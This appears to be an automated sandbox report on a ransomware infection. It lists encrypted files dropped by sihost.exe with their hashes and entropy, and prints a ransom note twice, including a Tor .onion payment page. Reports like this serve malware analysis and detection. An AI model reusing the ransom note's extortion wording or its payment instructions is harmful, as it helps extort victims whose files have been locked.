                                                                                                Preview: .^BC`.".......~..+w.."...I..P0B|.)7YC...WT8.W.........{...Tf.......r.U...k^0.....P....,.S...J3rW.Ol....2/...(..C.Uz.4=...,}].}............f.A....<.....[.*.s=........t....=..{..U"9ct? ?....ct..D&.FL...u..8:_....x.a.X...[......+.l..=...%.M.P..V..:..I..o....u.RW....Y*@.."..o...q.........]o.Va.).*t............?i%....a.ts..gO.d.....D'...O..S=..&.b...V...@Z...........ZOI..5.+...pfv)t%Yz./.;m.Tb....i.3D.Z....&..2..~.... U..T06..}.;...q..oB{.u...h..~..W9......a.....>..F....g. XU@.....zA.<G..3.....-:.A.Ac....SW.S..]...(.,.n...8....*..w.5....RX.B2.i....).a.S..Q=.....[M.>.....]......]....../...]X.6..P......S.9..........@.f.h...n.uS.....5.O.'_.D.}o.b3...m)Z.....z.9.P+.V..-.%v..~.JAw,I.......>.|.:;....u^./&..Gj........+y.-.@.H.;.-.4.......H.(.....m.y.^9=....}.B......j!..&....$.V...<<(.kT.;....U.<3.}.|.F.C.......f......N{.X.HGK....e6F.........|.X....Fq.../zP.....3[<...zR.....$;q}y.m.....Un..$.j.......R|...v....=..B6.O..R.....4...Z$<.n$.&........AC?6...23jz..
                                                                                                C:\Users\user\Desktop\IPKGELNTQY\IPKGELNTQY.docx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.841088143889491
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:ljvKFL3rGJ2TDoQ8u3Sdo7GnflJUT1FMI03UylSKVJMxqo46ce35OXGxp4NgtYj5:MdikYXuCdo7GnfcPMJt8pT50WhA3
                                                                                                MD5:338872DC674F7630F9AB23790E98E0E6
                                                                                                SHA1:8EB6CC51803F5403F3DBCB8ECA1D43F2C8DFC8C4
                                                                                                SHA-256:DC70E4F0AD496B24430DEB06CA953D66157860F272B9B95F1007BEC129005232
                                                                                                SHA-512:0957B4112BD972FDBA97A37081F9A54E999F9B3A51988EE44F402D36F3388C9C71C56250C8CE07AACB495D0A42BCD1F027AB4578250C990A0FF70BD2D004C5B8
                                                                                                Malicious:false
                                                                                                Preview: P...`Z+.n....L...f..s.tte..TW...{F\..}..<.v.....V.....ki..A..4]...l.H&..RG.6ec.......u.t:.O._%..Kq..TK.?9..F.....1..L.b.z7.L..q.9.H.i.m.Z....JI..m.....C.Q[.-..C.d..rz...5.....o.....Wf.>._.I...bm...s.?.Y.Vs..~~.fU.Ed.....<..9..0..SA......C...Q-aG.....?.2..$ ..L..XB...J......:i3...Q.<.^...8D.....Msf!0<.|....D...z..t^j...".}..;k......e..=..;6.Z..........%.t.I]...`.lg....K.O.9...wo^.T......}....n[l..,Z.....6G.(...x...._....k..06]k..sM*.).3..."....d.{..3.....iE...YT.8.y..S-....].G-./c.......Cv2..9..A.#..F1......J:p.N.]....W.._p.t.R@z.9..._vU.~"V.M....Vx.6..fw....H`.J......3...nxSAhk.t.......$..0.h...._.z. Of.u|.h....`...@......A.0L......MC/Y.U.A...YP.C........W5.i.Z.S.g.k.......R.C.LjE.Z......rF6....bTf.{.&.wa.a ..p....6qu.)....\pF[Y].\.Y../OrZ...4:26TPn..mW...n...Ma.......Ew..*..... n.zdC.wBW%...Jd._..b.e.......2.v.."@......?.=H.k.:qE.)........C..N]..d3....l.f...f?uj..$.w..&....;.0o.........&ef7dU...@S.p..wk..^.7..1.B ..=h&.u%.^....2.{t1......
                                                                                                C:\Users\user\Desktop\IPKGELNTQY\LSBIHQFDVT.pdf
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.862432618334164
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:El9/RpGrIWoS2N8/oyZl5DcqnrZLIsw9sOhqm+pzcCsSmwsLRuQfP0WiJ+1y:ErZkrnolScir+71+lcCsSmZ4yi9
                                                                                                MD5:539C5A7416AA7537AFBF6A405303C0FA
                                                                                                SHA1:315FFEB1E665F68B3812FB97B23676C87DC46B2A
                                                                                                SHA-256:3F106F0DA3C164BE6FD153F98089407536806A97C01656BC463D964BD33EE558
                                                                                                SHA-512:83917A3C81C0E28CF6EBDB42F37546BAAE87DCF2A31FF1B9F4F9BC94377C8A003738219E459C5927F27C28478EAC28977CB54CAFE4A12A9EB4F9E772DA550E40
                                                                                                Malicious:false
                                                                                                Preview: ^.._3I.#,?.. &o<8.V...9!.Q(....4..bY@....b..N...k\...:.3....wz/..W;pB..(....h..c..S...Ri....F.t...e...A&..{A....<.b.d. ..GD..I.k6y...v.A....u48]....3o...r.]DM....I..d.?s..b...i.......#i....(?...3.0...........u....^.....@.}..Eo......:..&nqv.q.#+..........3....W.Z...M. ..e...../ .=.A0+QYz..=.3..k_....'.Y.`l~k..X.OU..JT.nz..)7.......c..W.y.{..>M..x .}...3...G..,5~.s....%.TR........Ej..0P..E.....k#.W....vO(K..AQ,....k:J.o..8Z..!..\.'..C.+.;..%.n.ew...!..-o...*4Y..k/.2n"a.s>- /.. .)..=91. .n5.....LW..$.E1P....zQ]].%LY&..V...Px.b..i..f.R.Cx...U.@,.....a."...6.m.S.,...y.A...."........+...p1..;...*..!..".!0.f..@..E.4.vT.W......u...N..N..z..z.s.....#.C.=kg..U.,?......h..%p`/Z....!H.C.F......=`...6/m...=(.....;e......x...-.k...uIs....../......i.w......W..Xf..C4q...43..%..>.#...+..ad-".Z......%......+l....X...|..t.+.C.(....5h.............n#*..Q..+B^..x..{D......f.Md..x...62bC..K.I...C{.....+..."Pgz..S|o.MO..z.1..u..b..6.J.>.6Oo..Co.pYe.p.>V|..C.[.~".
                                                                                                C:\Users\user\Desktop\IPKGELNTQY\NEBFQQYWPS.xlsx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.859320003275073
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:a26E8Ac7tlr9D64zEXNrlxAEjKJjidrY6/fol3r1T8v/97UZ5WPl:a26ESE4ElzXjKJ6fot98vPd
                                                                                                MD5:9B7CEF646C4F5A2601531373561D2C4F
                                                                                                SHA1:28910220D79572E33DF20FAF7D5CA1E8657C783E
                                                                                                SHA-256:04E62620D0849A0D92AE93E3C1D0F8E2756D9A7003A4FDFA86150A5C1593DC15
                                                                                                SHA-512:8BFCA235BA573FF2F12E75B30430F312399443C6FC7EE4EC1099AB429A6AA522A566A8A00307A3A49B5B21FF695727822EB0A7520EE75B0E3432FF77D8CE89DA
                                                                                                Malicious:false
                                                                                                Preview: ......zg.;Yt.A.B......~b,4..2:..._.R?....6/.-y$...A[h..J..p...... ..,`8...]........W.%d......TV...]W.....H......]...R..n...1D.{.S....8..B./l..k..^pz>q.1O.(..r...'.pz.....q..;. d_3s...?.b......"1....._.(.. .er+..(...........k...=.....o.P.v..n.S.d.=1.....@...d..HQ5."|.T.d..N'...B..o......2@p.CYL...s.."....1w.,\........{nGwWI.1.c>.._.....0F.{..]....h.....,7\ejt....N...n?:mK6.....rd.T......Z.k\.5K..Ai]..)..R.me)S.HT........Zp9......?..s= Q..s?.D.G......5N.;........A@.=\..H.b._^..e..8....7$..#..8...>..9/.g.xu'.F......A.....-%..[..Q{a..P"/.9;....M*..O?.U..t...s.^.Z...Y..C.i~g......x2...I..uPx.u.K..SU...<....A......a..i%.&..fb.LS.m.....-..h.....|Md..^7ds$#..5..t...nH.`.>.d.....3D.....[......w..N..w.=(...:.&..d.5....-..f%mJF.q.....X.N3.DM.a4...........TFG....Ob..".I....b0PX..8.=..[..+.m:.F.0;q...qE...l8.Rb.......=..;mZ.C.DZ..Gx..3...(=.u.q..q...-......S3....G..e..[gf\..U.b.w....nm...OaB.9....I.p.x.rI.M.RM....D.......x.....
                                                                                                C:\Users\user\Desktop\IPKGELNTQY\ZQIXMVQGAH.jpg
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.848287684839076
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:cFVoOeEKckxZPgoFfTmhupkj9tjuCQd30wpUU+2HT05sPeUwStNTmd:8oOeEp+PgMfChSkZtjuCQ91pnTtPdwSI
                                                                                                MD5:235A69F3CE7C6D3936E8B4BD45DC1D06
                                                                                                SHA1:304CB2335B734B79E3BF9DE075F2055869C62CF0
                                                                                                SHA-256:B52C8964442F2EC05078AA9B9C8005AA693056416604C771940977882CF5CD9D
                                                                                                SHA-512:909279D70D86E84122C266FAD5C46E8514D649C468018C8BA30FBC0E01C1D6092B22439AE05DA0078FDED1308CF3ABA7639BE6E1D4A3280B393320365A7EB173
                                                                                                Malicious:false
                                                                                                Preview: .m...s..~..F..N......I..aw%~.......z. ..-......(......2<.ir.,g.x.uU1..d....q..-...,.R;jW...]..O.D.`.7DBSTc.%.1Y+TS...n.zM/.,.~.....\..F...). +..g..n.VhE.|.....k..C.x3~.z.p..nTM.. {........D.....B...O..o......a*{...X.t...[C~..?*....]..o..,6.-.1E&.&......G` |......7....m..z ..x\|...."?.....l.k.s.e..gz....`A..P...>~...LXL`}....F.../%U.v...........X-..M4....P.G..........n,....G.....BW.....e.l...#qoL...W.;.dy.R.A.I.s.........2....U..h.K.....SQv2M.M|.\!X....;I.g...?.e.D..".v....G..^.......J.].O....p<.%...Nz.......J..t..~.Q:+77..........."..!.A....lO.:R.5Q=_..,.8.#..%..sl....t.+...`.*.....({..B..#[..._W.......-k....I^,.#..D....xO-.....&.!...R...N..0v.&.....:P...F...3a.O..S.j..JVA'..,7...O}....%R@..ma.t..X...@o.....%...ht..p.I..rZ3.......).|M..2W..F..X..zH.g.3n,.~1\.#.f..P.Ay\.._V..+r.,I.Q7sb.....8L[...A.K,w....#...4&./.P.c.j..<.<.:1...^....B.._^..9.R....O.....[.}..._.w.5..F.y5.qZN.(.b.........5.O*....6.c..Y..I.....7y.S....\../.......?.8F...vj-f.p.9.
                                                                                                C:\Users\user\Desktop\IPKGELNTQY\readme.txt
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):3004
                                                                                                Entropy (8bit):4.834891694847581
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:eUimvpiIXMwOH+QMHw0dHrHeH+lgE0UimvpiIXMwOH+QMHw0dHrHeH+lgEV:erWxnOEbL+AsrWxnOEbL+At
                                                                                                MD5:62318A9E589ED3CE4D5AED91188DB708
                                                                                                SHA1:1C51B8F63FB9DD87C9BBF9714B03D082BBABEDF8
                                                                                                SHA-256:E7AE9C658A09C776DCA83794E0FD41DD2E8E0CB888626BDF07650E564B4585FA
                                                                                                SHA-512:5BA95687AF6C750F0DD91825B9F72AABC17B17226FB6FEB7E5AB98DD4F1028C763C4BA72CA0A102F6AC33C8925FB1B2EEEABA5C0E25D3B848B0AF0F2681B02AB
                                                                                                Malicious:false
                                                                                                Preview: ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED!.. ====================================================================================================.. Your files are NOT damaged! Your files are modified only. This modification is reversible..... The only 1 way to decrypt your files is to receive the private key and decryption program..... Any attempts to restore your files with the third party software will be fatal for your files!.. ====================================================================================================.. To receive the private key and decryption program follow the instructions below:.... 1. Download "Tor Browser" from https://www.torproject.org/ and install it..... 2. In the "Tor Browser" open your personal page here:...... http://aec850e8ac806e10a87438b00eltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj...... Note! This page is available via "Tor Browser" only... =============================================================
                                                                                                C:\Users\user\Desktop\LSBIHQFDVT.docx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.8421940155390395
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:4vrJ3Z4qvivxzxM4P/+6W8Mj8e/UFJRbPeMpv85vx5Fp3ILCW4p:yX4qq5xMJz7jV/6LegApd4yp
                                                                                                MD5:2A712F441417CB62D76A15979660705C
                                                                                                SHA1:D21E791688B4D0C46B319E9D1BC14B54ACA61044
                                                                                                SHA-256:D0076F5E1494C2F45ECD2C0F40F3CB645E8A6DE4F3A40CA9CE84092923F5924B
                                                                                                SHA-512:2F819E5AA5F394C1B13AFE9707FFCE4CFF646BB80EFDDF7C1B0C3EEBB9E7528BD3E043BAC0CAAD72E41FA9F31E390B1427974E803B55EFFD80BA13BFCB0BE0A0
                                                                                                Malicious:true
                                                                                                Preview: ..p..M4..l..r...:..@...pD...:.......:......^_...U.<8..#z.ws..Yv~{[...@.....T...%.Xc_.{.xU[.._.^.z|j....]V...)..F....".....!X....sa...>A.P..Z..../o..^QW....?..v.W....P......@.G.r...^.E..'!4. .}W.w...a.7.hr.;X;....n...t.....;.cg.....$....~..R.>..A.\..t..).r...bo...pj..Jz...$.b{.Xo.t.0k..~...[-g.";.k.JaD.....s.j.y.J........\R...r.@^.h..p>......v...W...D....$...i.{..=.pq.6d.-4...l)...MH...C...Hd......(1..Dz.X..C.W[o....?.vC....e]<.r<k...]..!....cF.....C*aH.&.r.._T.K....:K.... ;.,..}iq....<..'...Jo....o...;.w.%n.l#.S9l.%.h..,..L..>...(....Wjv.|.aqS.f.(.Duv=..\s.q@...aa....`.)......M.jP...h..9H7:.=|.7J..E..e.*,._D.PY>.....&Q.{..]..Z<....-...[.L..on._.;{%..lI.)..I.uI....*...7.......eV.rV.....q!..?..@..."._..|...J|e...mt..9Q.4B.(].hC........p..R....`.......vA9.I........~B.}.w~.s....y.b. (:.."..Z.Gu.....q6A..|l:.z...'......Z.#.[i?FDe.0...o..2...#..=...}.3..H.S.......FV.ZN..)F..:-`S.k8?m...BW...2.qTIq.....a.I5.(\....D..6CiD../. 7.p.Ji8........j...m
                                                                                                C:\Users\user\Desktop\LSBIHQFDVT.pdf
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.870711424465871
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:Vm9Xeikw9JtHbri3RWjeHV+6LBQFA4icCEeT+C0UstWLmcsNoba:6DkWJtHbvjeHV3L+F1CEejkBtoba
                                                                                                MD5:0F5F11A2CB0C568395A36D96795F3A2E
                                                                                                SHA1:09E0CB2ACCC0A6269416C4B3A51A56181034B43A
                                                                                                SHA-256:9100A04EFA847AF311A947C7D5EC38866D10DF931873C834046A4DD1BAD48609
                                                                                                SHA-512:559A23ECE486F1C83774478AA5A3197377E0C1F1AC99FECAFFE2793075E2EBF1074D2D8741DA0F66DA0DB33F0AA876D64AC69CBDAB81BBAB8A1AC496C0BAEF71
                                                                                                Malicious:false
                                                                                                Preview: ....8.3.L.oq.i.....i...{n;.......i.F+t.k.m.,.f... ....0.f[q.5......];.w.c...Bm.*.m.......S.s.h...u..5fU.......vM...z.!.>K.j.<bg..."];~.R.fB...k..[..3.... O_...>.Au.o.I....5.AJ..b....8N....).X..;^i.......6....../....K..l...'......8.QhS.3d......p..>.jBJ..n.T.$o3e..C.. 4.*....qi..)..........<!.M.!u'.M..q..5.LB.e...4..#..gA.F.nfk@9..=..._......?....?...@.........4Z....{...4...$....1.2.....I.Z(<A.MY.J..N.7T.s.yb...h;..p........N.....r.Wb...ZS.t.< ..ml....k.M..(.$.......X......].h.....V.i\.#..(.qj..:.6..@...vw....K..]...`..2.....Z.lt..v5...FR.O.8....r,.5.we.$TnP.gOw8|...z..(Vq..4._..3..\..3...f!..M.[...Rw..<......J..|......z.Z..UA.O._..5..Z....X.u.s.:.-.....<...|.EzI....>...H..S..z....9O.+..V..D'9..%..<K.Z..w.S.X.`.Z..o(q..,...C~..ZX}Z.U>H.r....@.|v../.RA5W.k.......{J.4...b.V9Us:...l.~B.h1.J.~a>...s@..".......J..=....ED......0!...$0.l.T..T.QC...{.}...k.+.$....3....g....F-h}.h..)..a...pJ.. :...jw.x.R....m....1hX.R.!..`..0....m...D.h..w.h!.}.F..1....&
                                                                                                C:\Users\user\Desktop\LSBIHQFDVT\EFOYFBOLXA.png
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.842392015528747
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:+x8z7x/F93wo7kC9NIZmpEA+Pjyxv9fPcJBaVnDc3/lfXE:+x8f7VwogO2dW0naVnDc3/5E
                                                                                                MD5:8C3A49C5F8B3DDCD050DD9A2ECACA54D
                                                                                                SHA1:7C9D6F48B8ABA431EB8C1FDA486287EFD7A9B5C7
                                                                                                SHA-256:BFEE284A6244C1B87DCB405BC14420A8751D33CF02D4F55A4DC8B55B0B343112
                                                                                                SHA-512:BE98DE43280145F5009B73EC0568B2F2E4DB1F7A64A4B1968EB2CA5A56ADF0887CF87B13485C10DB77B5690A32DE593057554E1B31FD0EDDEAAF36E61A727AB7
                                                                                                Malicious:false
                                                                                                Preview: .[|L.%}.I.1h.......@.iO.<4.k..R.......a..R]|.....*G.W..i...5.........pG].)r........-.G...J1.9..S..g.Cj3....czT..W.b..pH..I_..^......Pa.e.(.K..j/...,.......r t.[.`./s.Pn^.>og......>....i.(..2&V...D>c*.o....w..u.i...U.oN.9..."7Q.i?...9...ZTe...._.i.$..'...3Q.6e".j}..h....5.^!w....2.!a.^.v.....!..u.....5.Lcn..^..-...[H..{.^..."G2...r...F...)9.........F..`.i/. ....l...<m.A..3.oN]s...]...U.B.QNl .OSK.....8K..1%zPbg.^.Vc%.....G...@........`.]...f..A........+5...>.T&%.Kq.#=....3..w.]..z.XX.\... .........W.c..A..@.O..I5.O....T.9..s.dB.2;..1]n...a..RS....>.t.B........s.0GL.....S...'...8.e...d..o....-@......u\..l...kQ.N#3..&..22[@T.1......Q<.1t..,./E.*yij.....r.k?.....^..c.+.4.S.\Njti.._Jz.L^J........Fe...,j.."....%.0..._.l.0..y..n..=...{ .,n..I.`Q\S.].&@~....:...:Q.....v.1.].tK4{xTa.O......Y.r]..q..g.t....pa.....F.]...j0...[>;..5s.e.S...@........,u&.N..\..! \:4*Z.v...........&.nW. 6.D..r....n..ra.sl@..|....C0....sD..@9......q..'{g.e]..|....|..;.
                                                                                                C:\Users\user\Desktop\LSBIHQFDVT\LSBIHQFDVT.docx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.8647976809835605
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:sav/FJ5GA3Vaj5A5skqEJf9bI+N7vfPefqcNLR4nZ6IKl1E8:BTFUjER9ZNxsqZq48
                                                                                                MD5:0BE923158EC33CD02845DC2DAF0D8AB5
                                                                                                SHA1:09F930FFFF139EA27F39002A0899B43938215553
                                                                                                SHA-256:E0B34470AF085FB3FACAD3201A5EFD54408ED228BBDE2046D1861541B658D830
                                                                                                SHA-512:43B503B1C3A8BD76C8F44210B1A34A90426783B5682E10A5441025116998ABD57CF3E868C7479AEA0D0617E3FB2B8C34344709D6C6AA5E95B759FD830806CDDC
                                                                                                Malicious:false
                                                                                                Preview: ......G..0ebR..Y.M...S.I......#.i.6.\..bG...}....+<...+".....PrR<x7..v........~..jHI...I^VKE..<...|.~.....=y.}.X.i.... ..Cj.j].7V....[v*6.B..z.E..z......o.....=.......}m....K..P.v..e....NMs..tF.m...rfm.:..bS4...YMS5.....O........EF....]....2.A..[.O.'+.y4y.....\......A.vV...H...Q.(A$Pr.>...+7*...J).....~;.E...u....:..{.G...h...H.....49......_...Y.9>..7.G...Tf:......H{.1..Q.u88.x, oB8b...+....+|qA/.........J...#.6~._/y...'.?P........./.Y ..>...+.s....P'<h...;..L.#~m...%,.o.C..m.k|.?........#.R....z..e.%.O<J...7..W...-WE2R8v..p.w..[..&.{..a..T.....[........&.).9.M..O..56..qm....r...PP^I$.=.$H{j.7 ....i.O!....^?..?>.0L...j1Eg=E.........W.BxQ.oW...@....!k..E.=......5.A..b......\cB.Z...`)7.I.:_..s=....j........%.W\...8.eE.).5nv....RfV..h>.".&.h*....B.\........=...F.......,.B..S..gc.{.....SF..t8?..ki2)...F.@....3<j..............o.....I..4.F..y...7-D......B+.k..".{^.R......[\..^...../q:.y2...?.....A....X....!.!.L..DU.(.....TR...a......
                                                                                                C:\Users\user\Desktop\LSBIHQFDVT\QNCYCDFIJJ.xlsx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.847389152742023
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:qmnGO3pEunbC5vOLtP21OsqcXB53NI5WpxTGwuVF5UPyadoAGKM9:qmnGOpCxOZyOwR53hyVQDdjM9
                                                                                                MD5:E4A5E5D08DBBE865349BEA320D95515C
                                                                                                SHA1:EE5C7645B73F46A0687AC1562E8C5480E3609D66
                                                                                                SHA-256:7B58A87312B19A5603E2685684F1893C8927D5CCCD21BEF752C266A5C6CD4DC6
                                                                                                SHA-512:61D6E341BFFEDBC04884FADC15887FC0E27D8722970D3089F980FA7181D661B192C46CF8CBA6540CBA93B70F7EF86E0413B1FDB150B21DECED8DCD46C5730A67
                                                                                                Malicious:false
                                                                                                Preview: xJ...RP..@a..Z.3.3....+....Z..'.....-..>.[.Y..j..H..H.....f.N..gk.yF.T..r.v[...E....XZ'0.y........X..J..j.[........x..fM4.5W.p:O.q.:u..@.........e...3..........:.....`...t....E..?p.F.F..Le. ..O...........7...m......*l......ZaB:...ag.Y......F.b..Du../.~..tS.....dv'B!..-...K...X.EZ..l2..8%.k.#....B...L.........c...<....K..t.@6.......V...O....j5"..<......cN....x$N.)e..x."...F-,....Z.p.5..;.^1.Y=.c.6.)....>v%N.:.Q...w...N3....j......................t.V.....SB2.a.......Lv/..<.q.H....n..)f(Z?...0....... V~.j.B......s...t..5...7..Z.DG)......(.....D..J..R'.g..z\...lf........t.;...G.._..X..1...{C.e.....%.Q.m.....y.:..e.F...g$.$....a.....q...2.q0."<...r.d.6W....}.:$.W.Sx[.W....?/...L.11..&;..R.:....3..2.O.......lF....L..%.p..^.q..P...V...]...E..G..~.F...d....M6X.Eje.F....6..oQ....&v6KV......P...n...m...Q..+=.u.....a").....sf-...G9./{....U........I..Fq.{........ ..;.uHXY..........mX.[....Q1.(.$tl.2:...o .4.........$&....Y..&..T.-n.......6
                                                                                                C:\Users\user\Desktop\LSBIHQFDVT\SQSJKEBWDT.jpg
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:COM executable for DOS
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.835729366282277
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:scVXnJPAequAdV53ckcKxN7dK+iQlGOcdINYFieZTFF:scZJIegj5T5p7lcPciTFF
                                                                                                MD5:F4A0704F099C2CCA78311972C65EB744
                                                                                                SHA1:7F822FAEEB79084122D59EE393DEF117EFDC0AA0
                                                                                                SHA-256:7FE53557E06E4CE4D203BC5FEC30811D0093B7C5CA3E5846014F3552FAAE3560
                                                                                                SHA-512:19A03F1211169FA170D7AB50787571E498E0D7F4E8B488C294A500347D46E0A4B0F27B0E9F2AB76B2F1110189C15E2DDEE5CD9188CE79A78548D2A4A565AC922
                                                                                                Malicious:false
                                                                                                Preview: .....xP.K..rEV..\...e..4l...3..V..........8P.0.7..pP.7.[.M..g..&..........`V...M.....V.e..]...I+..E...q|..].+..taKm3.Q..B.Oo.$.P\...I.....z.5.hp.r....pn....a.,..Xq...t.!D.5.........{..C.....N7o.k...Pm...)+.NyG...yN.0...A...).tE..v...T..2..mO......qU.n...|,..b.pfk]6..r.......)D..O="jk......_,U.6@..I..Vn@@..{3C.c....%..V....vI..U...#.>D^...F.^Kv9.Tj......6...eI^rI....s-.....:.."T_/..........pa..-..+t..\.T.,.9^.Z-..)yx{O..Y.......j...WC.K..va5.5.T.....l...|X.px.)..4$8.....tRX...$....\....14.............q.......'(a..K..Af{i}"...)s..m$.e.Sv4.{.sE.o........C.....}.sX.$.O.{..P5..L...v,...........(.%LQ0.V.=..1...%...3..f>b7<;;.y..m........E.........<z....{.on...\.9_.8e....7....E.];o.5^.)...w.@qE........Q]%'..m.N0...u_../...(...c....._v..f.~2x...5.v...........>h...?....g..K$.V.:Qu...'8..i"....!.Mu........#.@..J.^..b...K.S..R...O2^.Q...u...@..o...C...|tF&.'....[..kZ6.....m...jE.'.S.'.,.P....H!.;s/$b.j:...|u.[..5y<0yuS.R...... C.c0`...7.
                                                                                                C:\Users\user\Desktop\LSBIHQFDVT\SUAVTZKNFL.pdf
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.864308387399517
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:XGAgIkg8O6xVYy2Wvb+ZUKrjWilO/XPOAAwTkH3ChSk7vv1GS+JFuPgQLb:XGA36920jBiAPAwTkH3wrvABMPgQv
                                                                                                MD5:EB3490E91AFDC76C3F0A36172ACE7C4E
                                                                                                SHA1:D0928A27F4A3B79800F602CBF973BDD5737CD6C1
                                                                                                SHA-256:7C8596C09A200AB5218AA8B0CB87A43386F983AECBA379BE1B2686F776E80C8B
                                                                                                SHA-512:4DF04DD874F944600595AE9F7CDA10D2A3A074C07EC86A9F31B9F4E9058B31075C51E6394BFF38DAAAFC7D84756DBD314E120CC36DDD3D838BADFD8EC7ED7E8A
                                                                                                Malicious:true
                                                                                                Preview: '..Z&....4[....4.K8F3-l..tt..C.YtuL).5..~.YM.......yqn...%....?/..n[....H.Y....Z.fI\.(2A#....sd-..RT.9........p...*..lp..HC...s.^....Q.......6R....W|.. L)..$J..Rd...-u.=Y..h..c....E.[.v.d.v /..O.M.j.....1.(..I.G...1.........e...G&.......:`r..V..6..!"..+.]?6...N....f.....k.<$o....<...+-.Z...iBL..)1..~.W.j...f.@....$'....X>O.B.z.i.P..C."%.D.k.@....p6.e....s_X....:.......@....A..Z.f.[\.'....p0.9~..............h..t.....*.""....\@..k..EH.....N-...L.b.......T....bI.&...b.Zm.S..IC.....DW^..0..Z...hll.*%...Y.n'...9g~R...JS....g..Y/AF.....r.&D..l.'.\....{I.;#....+...\.2..s.l.[.....;+R...h.)sA...C.+....q..]W@_.C.x...2..,..q.0.5S.qg..q.G.O.~.!.d.W'....:.[=.(...?F8.<.xc.u..g.Sk5>....U...x..64V.(...!U..2..j[..oa..}...mVX.....;....(....%...?4%......Qw.D..].[...y....>i.3..d..v]1..e..E.....Ei.&m..pX...>f.Gr......#A...n......g.W..z..t..sp...kKj.Q.Q...;..-e..{s.Y.pL.p.F._/...{.w....d.H......[...-...d7..=..g.....X......+....b.~L.B2..S.a9......?...,!..J..y!..
                                                                                                C:\Users\user\Desktop\LSBIHQFDVT\readme.txt
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):3004
                                                                                                Entropy (8bit):4.834891694847581
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:eUimvpiIXMwOH+QMHw0dHrHeH+lgE0UimvpiIXMwOH+QMHw0dHrHeH+lgEV:erWxnOEbL+AsrWxnOEbL+At
                                                                                                MD5:62318A9E589ED3CE4D5AED91188DB708
                                                                                                SHA1:1C51B8F63FB9DD87C9BBF9714B03D082BBABEDF8
                                                                                                SHA-256:E7AE9C658A09C776DCA83794E0FD41DD2E8E0CB888626BDF07650E564B4585FA
                                                                                                SHA-512:5BA95687AF6C750F0DD91825B9F72AABC17B17226FB6FEB7E5AB98DD4F1028C763C4BA72CA0A102F6AC33C8925FB1B2EEEABA5C0E25D3B848B0AF0F2681B02AB
                                                                                                Malicious:false
                                                                                                Preview: ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED!.. ====================================================================================================.. Your files are NOT damaged! Your files are modified only. This modification is reversible..... The only 1 way to decrypt your files is to receive the private key and decryption program..... Any attempts to restore your files with the third party software will be fatal for your files!.. ====================================================================================================.. To receive the private key and decryption program follow the instructions below:.... 1. Download "Tor Browser" from https://www.torproject.org/ and install it..... 2. In the "Tor Browser" open your personal page here:...... http://aec850e8ac806e10a87438b00eltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj...... Note! This page is available via "Tor Browser" only... =============================================================
                                                                                                C:\Users\user\Desktop\NEBFQQYWPS.docx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.852045251607469
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:OvtH6BRYmCyBXoMaQP0+eNcxb6ipwgmdCJEGE3rEBr6ii159uKca6i:4YRXXBX6+eoaUg3rEQf7F6i
                                                                                                MD5:1D5589D966D777EE5C96EC9D274DCDDB
                                                                                                SHA1:7F4434F18BCB342273C4F0531C2EC4495682133D
                                                                                                SHA-256:828DE72FE9CF216070E6FC8FC6DB1ED252FDA6D3CFDC6405914054735DC05818
                                                                                                SHA-512:F10BB7A178AF51F2E4A3A7411C51FB6D96F1A69FDCD5BDF1F4F5DCE93FE6A574B17B66DAC40DCD13B567E4CA90A9E98D9091DCB6604C9CB5834DD2DD43DBCA16
